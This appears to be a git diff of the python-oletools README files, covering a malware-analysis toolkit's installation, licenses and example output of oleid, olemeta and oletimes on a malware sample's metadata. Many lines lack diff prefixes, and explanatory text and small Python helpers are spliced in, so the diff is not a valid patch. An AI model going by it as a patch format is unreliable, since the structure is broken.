diff --git a/README.md b/README.md
index 4e900ff..e0c5205 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,9 @@ Note: python-oletools is not related to OLETools published by BeCubed Software.
 News
 ----
-- **2015-02-08 v0.08**: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) can now decode strings
+- **2015-03-23 v0.09**: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) now supports Word 2003 XML files,
+added anti-sandboxing/VM detection
+- 2015-02-08 v0.08: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) can now decode strings
 obfuscated with Hex/StrReverse/Base64/Dridex and extract IOCs. Added new triage mode, support for non-western codepages with olefile 0.42, improved API and display, several bugfixes.
 - 2015-01-05 v0.07: improved [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) to detect suspicious
diff --git a/oletools/README.html b/oletools/README.html
index 7390859..7f47cc0 100644
--- a/oletools/README.html
+++ b/oletools/README.html
@@ -1,65 +1,55 @@
- - -
- - - -python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter
-Note: python-oletools is not related to OLETools published by BeCubed Software.
-To use python-oletools from the command line as analysis tools, you may simply download the zip archive and extract the files in the directory of your choice.
-To get the latest development version, click on "Download repository" on the downloads page, or use mercurial to clone the repository.
-If you plan to use python-oletools with other Python applications or your own scripts, then the simplest solution is to use "pip install oletools" or "easy_install oletools" to download and install in one go. Otherwise you may download/extract the zip archive and run "setup.py install".
-The latest version of the documentation can be found online, otherwise a copy is provided in the doc subfolder of the package.
-This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
-To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
-You may also contact the author directly to provide feedback.
-The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
-This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
-The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)
-All rights reserved.
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
-officeparser is copyright (c) 2014 John William Davison
-Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
- - +python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
+Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter
+Note: python-oletools is not related to OLETools published by BeCubed Software.
+To use python-oletools from the command line as analysis tools, you may simply download the zip archive and extract the files in the directory of your choice.
+To get the latest development version, click on "Download repository" on the downloads page, or use mercurial to clone the repository.
+If you plan to use python-oletools with other Python applications or your own scripts, then the simplest solution is to use "pip install oletools" or "easy_install oletools" to download and install in one go. Otherwise you may download/extract the zip archive and run "setup.py install".
+The latest version of the documentation can be found online, otherwise a copy is provided in the doc subfolder of the package.
+This is a personal open-source project, developed in my spare time. Any contribution, suggestion, feedback or bug report is welcome.
+To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
+You may also contact the author directly to provide feedback.
+The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
+This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
+The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)
+All rights reserved.
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
+officeparser is copyright (c) 2014 John William Davison
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/oletools/README.rst b/oletools/README.rst
index 01f5e7d..a5614fd 100644
--- a/oletools/README.rst
+++ b/oletools/README.rst
@@ -1,188 +1,191 @@
-python-oletools
-===============
-
-`python-oletools
This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
-To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
-You may also contact the author directly to provide feedback.
-The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
-How to Suggest Improvements, Report Issues or Contribute
+========================================================
+This is a personal open-source project, developed in my spare time. Any contribution, suggestion, feedback or bug report is welcome.
+To suggest improvements, report a bug or any issue, please use the issue reporting page,
+providing all the information and files to reproduce the problem.
+You may also contact the author directly to provide feedback.
+The code is available in a Mercurial repository on Bitbucket.
+You may use it to submit enhancements using forks and pull requests.
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+This is the home page of the documentation for python-oletools. The latest version can be found online, otherwise a copy is provided in the doc subfolder of the package.
-python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter
-Note: python-oletools is not related to OLETools published by BeCubed Software.
-python-oletools v0.09 documentation
+===================================
+This is the home page of the documentation for python-oletools. The latest version can be found
+online, otherwise a copy is provided in the doc subfolder of the package.
+python-oletools is a package of python tools to analyze Microsoft OLE2 files
+(also called Structured Storage, Compound File Binary Format or Compound Document File Format),
+such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging.
+It is based on the olefile parser.
+See http://www.decalage.info/python/oletools for more info.
+Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter
+Note: python-oletools is not related to OLETools published by BeCubed Software.
+Tools in python-oletools:
+olebrowse: a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
+view and extract individual data streams.
+oleid: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.
olemeta: a tool to extract all standard properties (metadata) from OLE files.
oletimes: a tool to extract creation and modification timestamps of all streams and storages.
olevba: a tool to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
pyxswf: a tool to detect, extract and analyze Flash objects (SWF) that may
be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF,
+which is especially useful for malware analysis.
+rtfobj: a tool and python module to extract embedded objects from RTF files.
and a few others (coming soon)
+For now, python-oletools require Python 2.x, if possible 2.6 or 2.7. They are not compatible with Python 3.x yet.
-To use python-oletools from the command line as analysis tools, you may simply download the zip archive and extract the files in the directory of your choice. Pick the latest release version, or click on "Download Repository" to get the latest development version with the most recent features.
-Another possibility is to use a Mercurial client (hg) to clone the repository in a folder. You can then update it easily in the future.
-You may add the oletools directory to your PATH environment variable to access the tools from anywhere.
-If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use "pip install oletools" or "easy_install oletools" to download and install the package in one go. Pip is included with Python since version 2.7.9.
-Important: to update oletools if it is already installed, you must run "pip install -U oletools", otherwise pip will not update it.
-Alternatively, you may download/extract the zip archive in a temporary directory and run "python setup.py install".
-How to Download and Install python-oletools
+===========================================
+Pre-requisites
+For now, python-oletools requires Python 2.x, preferably 2.7 or 2.6 to enable all features.
+It is not compatible with Python 3.x yet. (Please contact me if that is a strong requirement.)
+To use oletools as command-line tools
+To use python-oletools from the command line as analysis tools, you may simply
+download the zip archive
+and extract the files into the directory of your choice. Pick the latest release version, or click on
+"Download Repository" to get the latest development version with the most recent features.
+Another possibility is to use a Mercurial client (hg) to clone the repository into a folder. You can then update it easily
+in the future.
+You may add the oletools directory to your PATH environment variable to access the tools from anywhere.
+It is very convenient to create symbolic links to each tool in one of the bin directories in order to run them as shell
+commands from anywhere. For example, here is how to create an executable link "olevba" in /usr/local/bin pointing to
+olevba.py, assuming oletools was unzipped into /opt/oletools:
+chmod +x /opt/oletools/oletools/olevba.py
+ln -s /opt/oletools/oletools/olevba.py /usr/local/bin/olevba
+Then the olevba command can be used from any directory:
+user@remnux:~/MalwareZoo/VBA$ olevba dridex427.xls |less
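The link setup shown above can also be scripted, for instance when deploying several tools at once. The following is a minimal Python sketch, assuming a POSIX system; `link_tool` is a hypothetical helper name and is not part of python-oletools.

```python
import os
import stat


def link_tool(script_path, link_path):
    """Make script_path executable and create a symbolic link to it at link_path."""
    # Equivalent of "chmod +x": add the execute bits to the current mode.
    mode = os.stat(script_path).st_mode
    os.chmod(script_path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    # Equivalent of "ln -s": raises OSError if link_path already exists.
    os.symlink(script_path, link_path)
    return link_path
```

With the paths from the example above, the call would be `link_tool('/opt/oletools/oletools/olevba.py', '/usr/local/bin/olevba')`, which normally requires write access to /usr/local/bin.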
+For python applications
+If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use
+"pip install oletools" or "easy_install oletools" to download and install the package in one go. Pip is included
+with Python since version 2.7.9.
+Important: to update oletools if it is already installed, you must run "pip install -U oletools", otherwise pip
+will not update it.
+Alternatively if you prefer the old school way, you may download the
+zip archive, extract it into
+a temporary directory and run "python setup.py install".
+This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
-The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)
-All rights reserved.
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-| License for officeparser | -
olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
-officeparser is copyright (c) 2014 John William Davison
-Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-License for python-oletools
+===========================
+This license applies to the python-oletools package, apart from the
+thirdparty folder which contains third-party files published with their own license.
+The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)
+All rights reserved.
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
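+Redistributions of source code must retain the above copyright notice, this
+list of conditions and the following disclaimer.
+Redistributions in binary form must reproduce the above copyright notice,
+this list of conditions and the following disclaimer in the documentation
+and/or other materials provided with the distribution.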
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+License for officeparser
+olevba contains modified source code from the officeparser project, published
+under the following MIT License (MIT):
+officeparser is copyright (c) 2014 John William Davison
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
-It is part of the python-oletools package.
-olebrowse.py [file]
-If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
-Main menu, showing all streams in the OLE file:
-
-Menu with actions for a stream:
-
-Hex view for a stream:
-
-olebrowse
+=========
+olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
+view and extract individual data streams.
+It is part of the python-oletools package.
+Usage
+olebrowse.py [file]
+If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
+Screenshots
+Main menu, showing all streams in the OLE file:
+
+Menu with actions for a stream:
+
+Hex view for a stream:
+
+oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.
-It is part of the python-oletools package.
-Planned improvements:
-oleid.py <file>
-Analyzing a Word document containing a Flash object and VBA macros:
-C:\oletools>oleid.py word_flash_vba.doc
-
-Filename: word_flash_vba.doc
-+-------------------------------+-----------------------+
-| Indicator | Value |
-+-------------------------------+-----------------------+
-| OLE format | True |
-| Has SummaryInformation stream | True |
-| Application name | Microsoft Office Word |
-| Encrypted | False |
-| Word Document | True |
-| VBA Macros | True |
-| Excel Workbook | False |
-| PowerPoint Presentation | False |
-| Visio Drawing | False |
-| ObjectPool | True |
-| Flash objects | 1 |
-+-------------------------------+-----------------------+
-First, import oletools.oleid, and create an OleID object to scan a file:
-import oletools.oleid
-
-oid = oletools.oleid.OleID(filename)
-Note: filename can be a filename, a file-like object, or a bytes string containing the file to be analyzed.
-Second, call the check() method. It returns a list of Indicator objects.
-Each Indicator object has the following attributes:
-For example, the following code displays all the indicators:
-indicators = oid.check()
-for i in indicators:
- print 'Indicator id=%s name="%s" type=%s value=%s' % (i.id, i.name, i.type, repr(i.value))
- print 'description:', i.description
- print ''
-See the source code of oleid.py for more details.
-oleid
+=====
+oleid is a script to analyze OLE files such as MS Office documents (e.g. Word,
+Excel), to detect specific characteristics usually found in malicious files (e.g. malware).
+For example it can detect VBA macros and embedded Flash objects.
+It is part of the python-oletools package.
+Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)
Detect VBA Macros
Detect embedded Flash objects
Detect embedded OLE objects
Detect MS Office encryption
Can be used as a command-line tool
Python API to integrate it in your applications
Planned improvements:
+Extract the most important metadata fields
Support for OpenXML files and embedded OLE files
Generic VBA macros detection
Detect auto-executable VBA macros
Extended OLE file types detection
Detect unusual OLE structures (fragmentation, unused sectors, etc)
Options to scan multiple files
Options to scan files from encrypted zip archives
CSV output
oleid.py <file>
+Analyzing a Word document containing a Flash object and VBA macros:
+C:\oletools>oleid.py word_flash_vba.doc
+
+Filename: word_flash_vba.doc
++-------------------------------+-----------------------+
+| Indicator                     | Value                 |
++-------------------------------+-----------------------+
+| OLE format                    | True                  |
+| Has SummaryInformation stream | True                  |
+| Application name              | Microsoft Office Word |
+| Encrypted                     | False                 |
+| Word Document                 | True                  |
+| VBA Macros                    | True                  |
+| Excel Workbook                | False                 |
+| PowerPoint Presentation       | False                 |
+| Visio Drawing                 | False                 |
+| ObjectPool                    | True                  |
+| Flash objects                 | 1                     |
++-------------------------------+-----------------------+
+First, import oletools.oleid, and create an OleID object to scan a file:
+import oletools.oleid
+
+oid = oletools.oleid.OleID(filename)
+Note: filename can be a filename, a file-like object, or a bytes string containing the file to be analyzed.
+Second, call the check() method. It returns a list of Indicator objects.
+Each Indicator object has the following attributes:
+id: str, identifier for the indicator
name: str, name to display the indicator
description: str, long description of the indicator
type: class of the indicator (e.g. bool, str, int)
value: value of the indicator
For example, the following code displays all the indicators:
+indicators = oid.check()
+for i in indicators:
+    print 'Indicator id=%s name="%s" type=%s value=%s' % (i.id, i.name, i.type, repr(i.value))
+    print 'description:', i.description
+    print ''
+See the source code of oleid.py for more details.
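Since each Indicator exposes `id` and `value`, the list returned by `check()` can be turned into a dictionary for quick lookups. The sketch below runs without oletools installed, under these assumptions: the `Indicator` namedtuple is only a stand-in for the real objects, `indicators_by_id` is a hypothetical helper, and the `id` strings in the sample data are made up for illustration (oleid.py has the real ones).

```python
from collections import namedtuple

# Stand-in for oleid's Indicator objects, with the attributes listed above.
Indicator = namedtuple('Indicator', 'id name description type value')


def indicators_by_id(indicators):
    """Map each indicator id to its value."""
    return dict((i.id, i.value) for i in indicators)


# Sample data mirroring the command-line example; the ids are hypothetical.
sample = [
    Indicator('vba_macros', 'VBA Macros', 'hypothetical description', bool, True),
    Indicator('flash', 'Flash objects', 'hypothetical description', int, 1),
]
values = indicators_by_id(sample)
```

With a real scan, the equivalent call would be `indicators_by_id(oid.check())`.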
+olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.
-It is part of the python-oletools package.
-olemeta.py <file>
-Checking the malware sample DIAN_caso-5415.doc:
->olemeta.py DIAN_caso-5415.doc
-
-Properties from SummaryInformation stream:
-- codepage: 1252
-- title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
-- subject: ''
-- author: 'OFEyDV'
-- keywords: ''
-- comments: ''
-- template: 'Normal.dotm'
-- last_saved_by: 'clein'
-- revision_number: '13'
-- total_edit_time: 4800L
-- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
-- create_time: datetime.datetime(2009, 3, 30, 14, 18)
-- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
-- num_pages: 7
-- num_words: 269
-- num_chars: 1485
-- thumbnail: None
-- creating_application: 'Microsoft Office Word'
-- security: 0
-
-Properties from DocumentSummaryInformation stream:
-- codepage_doc: 1252
-- category: None
-- presentation_target: None
-- bytes: None
-- lines: 12
-- paragraphs: 3
-- slides: None
-- notes: None
-- hidden_slides: None
-- mm_clips: None
-- scale_crop: False
-- heading_pairs: None
-- titles_of_parts: None
-- manager: None
-- company: 'Servicio de Impuestos Internos'
-- links_dirty: False
-- chars_with_spaces: 1751
-- unused: None
-- shared_doc: False
-- link_base: None
-- hlinks: None
-- hlinks_changed: False
-- version: 786432
-- dig_sig: None
-- content_type: None
-- content_status: None
-- language: None
-- doc_version: None
-TODO
-olemeta
+=======
+olemeta is a script to parse OLE files such as MS Office documents (e.g. Word,
+Excel), to extract all standard properties present in the OLE file.
+It is part of the python-oletools package.
+olemeta.py <file>
+Checking the malware sample DIAN_caso-5415.doc:
+>olemeta.py DIAN_caso-5415.doc
+
+Properties from SummaryInformation stream:
+- codepage: 1252
+- title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
+- subject: ''
+- author: 'OFEyDV'
+- keywords: ''
+- comments: ''
+- template: 'Normal.dotm'
+- last_saved_by: 'clein'
+- revision_number: '13'
+- total_edit_time: 4800L
+- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
+- create_time: datetime.datetime(2009, 3, 30, 14, 18)
+- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
+- num_pages: 7
+- num_words: 269
+- num_chars: 1485
+- thumbnail: None
+- creating_application: 'Microsoft Office Word'
+- security: 0
+
+Properties from DocumentSummaryInformation stream:
+- codepage_doc: 1252
+- category: None
+- presentation_target: None
+- bytes: None
+- lines: 12
+- paragraphs: 3
+- slides: None
+- notes: None
+- hidden_slides: None
+- mm_clips: None
+- scale_crop: False
+- heading_pairs: None
+- titles_of_parts: None
+- manager: None
+- company: 'Servicio de Impuestos Internos'
+- links_dirty: False
+- chars_with_spaces: 1751
+- unused: None
+- shared_doc: False
+- link_base: None
+- hlinks: None
+- hlinks_changed: False
+- version: 786432
+- dig_sig: None
+- content_type: None
+- content_status: None
+- language: None
+- doc_version: None
+TODO
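In the sample output above, string properties such as `title` appear as raw byte strings, and the `codepage` property (1252 here) indicates how they are encoded. The following is a minimal sketch of decoding such a value to Unicode. `decode_property` is a hypothetical helper, not part of olemeta, and it assumes that the codepage number maps to a Python codec named `cp<number>`, which holds for 1252 but not for every Windows codepage.

```python
def decode_property(raw, codepage):
    """Decode a raw property byte string using its Windows codepage number."""
    # Assumption: Python ships a codec called 'cp<codepage>' (true for cp1252).
    return raw.decode('cp%d' % codepage)


# Title bytes copied from the SummaryInformation output above.
title = decode_property(b'Gu\xeda MIPYME para ser emisor electr\xf3nico', 1252)
```

An unknown codepage makes `decode` raise `LookupError`, so a caller may want to fall back to showing the raw bytes in that case.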
+oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.
-It is part of the python-oletools package.
-oletimes.py <file>
-Checking the malware sample DIAN_caso-5415.doc:
->oletimes.py DIAN_caso-5415.doc
-
-+----------------------------+---------------------+---------------------+
-| Stream/Storage name | Modification Time | Creation Time |
-+----------------------------+---------------------+---------------------+
-| Root | 2014-05-14 12:45:24 | None |
-| '\x01CompObj' | None | None |
-| '\x05DocumentSummaryInform | None | None |
-| ation' | | |
-| '\x05SummaryInformation' | None | None |
-| '1Table' | None | None |
-| 'Data' | None | None |
-| 'Macros' | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
-| 'Macros/PROJECT' | None | None |
-| 'Macros/PROJECTwm' | None | None |
-| 'Macros/VBA' | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
-| 'Macros/VBA/ThisDocument' | None | None |
-| 'Macros/VBA/_VBA_PROJECT' | None | None |
-| 'Macros/VBA/__SRP_0' | None | None |
-| 'Macros/VBA/__SRP_1' | None | None |
-| 'Macros/VBA/__SRP_2' | None | None |
-| 'Macros/VBA/__SRP_3' | None | None |
-| 'Macros/VBA/dir' | None | None |
-| 'WordDocument' | None | None |
-+----------------------------+---------------------+---------------------+
-TODO
-oletimes
+========
+oletimes is a script to parse OLE files such as MS Office documents (e.g. Word,
+Excel), to extract creation and modification times of all streams and storages
+in the OLE file.
+It is part of the python-oletools package.
+oletimes.py <file>
+Checking the malware sample DIAN_caso-5415.doc:
+>oletimes.py DIAN_caso-5415.doc
+
++----------------------------+---------------------+---------------------+
+| Stream/Storage name        | Modification Time   | Creation Time       |
++----------------------------+---------------------+---------------------+
+| Root                       | 2014-05-14 12:45:24 | None                |
+| '\x01CompObj'              | None                | None                |
+| '\x05DocumentSummaryInform | None                | None                |
+| ation'                     |                     |                     |
+| '\x05SummaryInformation'   | None                | None                |
+| '1Table'                   | None                | None                |
+| 'Data'                     | None                | None                |
+| 'Macros'                   | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
+| 'Macros/PROJECT'           | None                | None                |
+| 'Macros/PROJECTwm'         | None                | None                |
+| 'Macros/VBA'               | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
+| 'Macros/VBA/ThisDocument'  | None                | None                |
+| 'Macros/VBA/_VBA_PROJECT'  | None                | None                |
+| 'Macros/VBA/__SRP_0'       | None                | None                |
+| 'Macros/VBA/__SRP_1'       | None                | None                |
+| 'Macros/VBA/__SRP_2'       | None                | None                |
+| 'Macros/VBA/__SRP_3'       | None                | None                |
+| 'Macros/VBA/dir'           | None                | None                |
+| 'WordDocument'             | None                | None                |
++----------------------------+---------------------+---------------------+
